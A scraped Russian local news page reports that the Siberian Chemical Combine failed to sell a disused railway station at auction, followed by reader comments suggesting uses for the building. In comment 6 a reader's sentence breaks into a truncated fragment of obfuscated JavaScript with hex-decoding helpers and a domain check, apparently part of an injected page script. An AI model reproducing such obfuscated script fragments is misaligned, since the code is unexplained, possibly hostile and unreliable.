Последние комментарии:

вчера в 18:36 написал ponni
23.04.2024 20:22 написал барыга
23.04.2024 00:04 написал ponni
22.04.2024 21:37 написал барыга
22.04.2024 20:26 написал ponni
10.04.2024 12:39 написал ponni
05.04.2024 09:57 написал ponni
04.04.2024 19:31 написал navator
02.04.2024 16:31 написал ponni
31.03.2024 16:27 написал shrek
29.03.2024 22:11 написал барыга
29.03.2024 09:38 написал ponni
28.03.2024 21:49 написал барыга
26.03.2024 00:12 написал ponni
19.03.2024 20:31 написал ponni


Комбинат не смог продать железнодорожный вокзал


Комбинат не смог продать железнодорожный вокзал

Аукцион не состоялся из-за отсутствия заявок. Ранее СХК выставил на продажу непрофильный актив, в который входит железнодорожный комплекс. Начальная цена лота составляла около 17 миллионов рублей. Прием заявок на аукцион был открыт до 30-го мая, однако ни один покупатель так и не заявился. Данный железнодорожный вокзал не функционирует с 2000 годов, когда сотрудников СХК перестали доставлять на работу на поезде.

Напомним, аукцион должен был проводиться на электронной торговой площадке Fabrikant.ru 31 мая. Начальная цена выставленного на торги имущества составляла 16 миллионов 733 тысячи 200 рублей.





Категория: Новости » Северск » Общество

Комментарии: (30) 

07 июня 2016   3

Информация

Посетители, находящиеся в группе Гости, не могут оставлять комментарии в данной новости.
 

Комментарий № 1:

Написал: xabk
да кому он нужен ваш вокзал. :(

Комментарий № 2:

Написал: Мефодий
марию ра там сделать

Комментарий № 3:

Написал: Williams
подаю бесплатно идею - развлекательный комплекс 

Комментарий № 4:

Написал: Зелёный лес
фотография липовая. Эти часы на здании давным-давно демонтированы. Сначала коллектив ЖДЦ скинулся и купил аж светодиодные часы. Недолго проработали...
Кому оно нужно это здание?  Под школу не надо: в городе есть пара-тройка пустующих "школ". Бизнес-центры в городе есть и не один. 
Здание надо снести, чтоб не напоминало о лучших временах комбината, и на этой земле гаражи понастроить. Я ещё застал время, когда на привокзальной площади народ толпился, чтобы уехать на заводы, с завода в город. Мне посчастливилось прокатиться на поезде и не раз.
Застал то время, когда в фойе вокзала висел (и сейчас там висит) плакат "Они позорят наш коллектив!" (изображение пьяницы-тунеядца). Долго в здании вокзала работала парикмахерская, часовая мастерская. В лихие 90-е там продавали сметану и творог (привозные с Заварзино).
А потом на заводе началась оптимизация: стали экономить на "спичках". 17 миллионов?? Не смешите народ. Максимум 5-6 млн. А 11.000.000 - это <понятно на что> .

Комментарий № 5:

Написал: AGKUYTM
Зачем продавать то ,что может принести огромные деньги в Городской Бюджет .Можно заключить торговое соглашение С Российскими Железными Дорогами России ,о том чтоб в наш город ходили Электрички и Поезда ,Ибо теперь Автобусы из нашего Города курсируют Мимо Железно Дорожного  Вокзала и Мимо Авто Вокзала .Жители нашего города обрадуются ,то что на работу можно будет ездить на электричках ,да и кстати нужно поехать в Кемерово и Новосибирск ,зашел на наш вокзал купил билеты ,поезд подошел у ехал ,обратно купил билеты ,приехал ,и без пересадок и без пере платы  !И Деньги Бюджету не помешают !


--------------------
С Уважением Евгений Харлан !

Комментарий № 6:

Написал: v0va1988
хотели же что бы из северска в томск электричка ходила  // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "vseverske.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий № 7:

Написал: Roman
AGKUYTM,
Пассажирские перевозки для РЖД не интересны.

Комментарий № 8:

Написал: Roman
В городе продается куча коммерческой недвижимости по неадекватной цене. Не представляю кто бы купил это здание на 17млн

Комментарий № 9:

Написал: AlKosta
Пусть Администрация горорода договорится с руководством СХК и отдадут вокзал под городской рынок. А то бедный Диденко не зает куда и где рынок разместить. А здесь будет нормально.

Комментарий № 10:

Написал: AGKUYTM
Roman,
Российские Железные Дороги ,это Град Образующие Предприятие России ,и Естественно им будет Выгодно заключить Торговые Бизнес Отношение с Российскими Атомщиками Тоже Град Образующим Предприятием России .Если Наша Администрация нашего города хочет получить статус Бизнес Наука Града ,для нашего города .то должны проявит политическую и бизнес коммерческую волю ,Пора уже возвращать нашему городу статус Град Образующего Города ,для Всей России ,И Быть независимым городом от Томска ,со своим собственным бюджетом !


--------------------
С Уважением Евгений Харлан !

Комментарий № 11:

Написал: Roman
AGKUYTM,
Что за поток сознания? Я еще раз повторю - для РЖД пассажирские перевозки не интересны в принципе. 90% дохода РЖД получает от грузовых перевозок, а пассажирские висят убытками, которые частично компенсируются трансфертами из бюджета. О какой вы выгоде говорите? Денег тут нет.

Комментарий № 12:

Написал: Roman
AGKUYTM,
И, кстати, Северск имеет собственный бюджет. Доходная часть 3,8млрд рублей в год, из которых на собственные доходы приходится только 800млн, а остальное - трансферты из федерального бюджета.

Комментарий № 13:

Написал: СХКовец
Опять харлана из реабилитационного центра выпустили? Чего то рановато!

Комментарий № 14:

Написал: ТЕРРАН
место для ресторана или дискотек! в стороне от жилого массива
 

Комментарий № 15:

Написал: Roman
ТЕРРАН,
Вы серьезно? Вспомните чем кончили все прошлые похожие проекты. Быдло, водка, наркоманы и мордобой.

Комментарий № 16:

Написал: Ниньтенда
Такой бред с размером суммы как и идея пассажирских перевозок. Пожалуй лучшее что может произойти так это реконструкция здания в жилой дом для безвозмездной передачи нуждающимся в жил. площади семьям! Это будет жест доброй воли от СХК тем, кто доверился  и отдал свой голос когда-то "команде СХК".

Комментарий № 17:

Написал: ParaFIN
Вот идея, перенести туда ЗАГС.

Комментарий № 18:

Написал: ololo
Распилить всё что там осталось, выбить окна и двери и сделать там бесплатное жилище для бомжей. Или общественный туалет.

Комментарий № 19:

Написал: Artem2016
AGKUYTM,
Займись этим вопросом)))

Комментарий № 20:

Написал: Roman
ParaFIN,
Кстати, отличная мысль.

Комментарий № 21:

Написал: Ульяна
смешно смешно:)) и грустно ,конечно. Я бы сделал атракцион катание на поезде и чтобы самим можно было им управлять, и город открыть,чтобы с Новосиба приезжали на этот аттракцион,тогда окупиться

Комментарий № 22:

Написал: f1gv83
Цитата: AGKUYTM
Российские Железные Дороги ,это Град Образующие Предприятие России ,и Естественно им будет Выгодно заключить Торговые Бизнес Отношение с Российскими Атомщиками Тоже Град Образующим Предприятием России .Если Наша Администрация нашего города хочет получить статус Бизнес Наука Града ,для нашего города .то должны проявит политическую и бизнес коммерческую волю ,Пора уже возвращать нашему городу статус Град Образующего Города ,для Всей России ,И Быть независимым городом от Томска ,со своим собственным бюджетом !

какие РЖД? там уже давным давно рельсы убрали, все перекопали и вряд ли что-то кто-то будет делать...
к тому же, поезда надо где-то обслуживать, загонять в отстойники - где у нас такое место? идет состав с углем - в длину как улица Северная...
одно дело вокзал для электричек туда-сюда смотаться несколькими вагонами, другое - серьезные мощности. и что тут представляет интерес? ни пассажиров, ни груза... производство все похерили, вывозить для торговли нечего....
город в болото превращается, вопрос спального района - дело времени.

Комментарий № 23:

Написал: vvm
поддерживаю идею превратить вокзал в малогабаритное жильё для остронуждающихся, безвозмездно или за символическую плату.
Но - кто даст на это денег? "Денег нет" (с)

Комментарий № 24:

Написал: Зелёный лес
надо здание превратить в гостиницу, типа, "сдам на час, сутки, неделю". Выделить там одно крыло под ночлежку для сильно пьяных элементов. Типа, выспался, протрезвел, утром - на работу. Да, стены отдать под граффити. Другое крыло здание отдайте под общественный туалет. Очень удобно: приехал на машине, сделал дело, уехал. Раньше вроде как "442" заворачивал на ул.Свердлова и ехал через вокзал - не помню. А сейчас можно пешком дойти от "Старая баня" и обратно. 
 

Комментарий № 25:

Написал: згэс
Идея с ЗАГСом самая лучшая, но им хватит и одного крыла на одном этаже.

Комментарий № 26:

Написал: Мефодий
Цитата: Зелёный лес
Другое крыло здание отдайте под общественный туалет. Очень удобно: приехал на машине, сделал дело, уехал
 
и маршрут автобусный провести,не у всех ведь машины есть,а в туалет все ходят. 

Комментарий № 27:

Написал: Зелёный лес
Один этаж читатели сайта уже "заняли": общественный туалет (одно крыло), ночлежка (фойе), гостиница "на часы, сутки, неделю" (другое крыло).

Предлагаю это всё разместить на втором этаже. А вот на первом сделать баню. Поделить её на три класса. VIP-класс - для богатых. Чтоб по высшему разряду, девочки прилагались, время с 22:00 до 6:00 (тогда все успеют ещё на работу доехать).
Первый класс отдать на выкуп "Ильинским баням" и пр. То же самое, что в обычных "Ильинских банях". 
Третью часть (треий класс) отдать под мытьё обитателей ночлежки, под клиентов гостиницы "на часы, сутки, неделю". С одной функцией: просто помыться из шланга, привести себя в надлежащий более-менее вид и до следующего визита. За счёт социального обеспечения выдавать в этот "второй класс" талоны на бесплатное питание, промывку и простую одежду (нижнее бельё). 

Комментарий № 28:

Написал: Зелёный лес
Цитата: Зелёный лес
в этот "второй класс"
выдавать в "третий класс".

Комментарий № 29:

Написал: werlok
КАК ВСЕГДА СХК ТАМ ВОР НА ВОРЕ ВОРОМ ПОГОНЯЕТ У ТОЧИЛИНА ВООБЩЕ СЕМЕЙНЫЙ ПОДРЯД КУДА ТОЛЬКО ПРОКУРАТУРА И ФСБ СМОТРИТ ОЧЕРЕДНОЙ ПРЕТИНДЕНТ В ПУТЬ ЗА КОРОТКЕВИЧЕМ ПРОДАЮТ ВСЁ МАХИНАЦИИ С ЗАКУПКАМИ ТЕНДЕРАМИ НА ОБСЛУЖИВАНИЕ 

Комментарий № 30:

Написал: Artem2016
werlok,
А "совесть" вкурсе?
А "совесть" в доле!..
lol  
stroimguru.ru
Курс валюты:
92.01 34↓   $     98.71 87↑  

Опрос дня:

Вы будете делать прививку от коронавируса?

Нет   49.38%
   
Да, планирую   8.64%
   
Да, но если заставят (на работе / для путешествий)   4.94%
   
Уже сделал   27.16%
   
Затрудняюсь ответить   9.88%
   
Всего голосов: 81

Все опросы >>

Архив статей: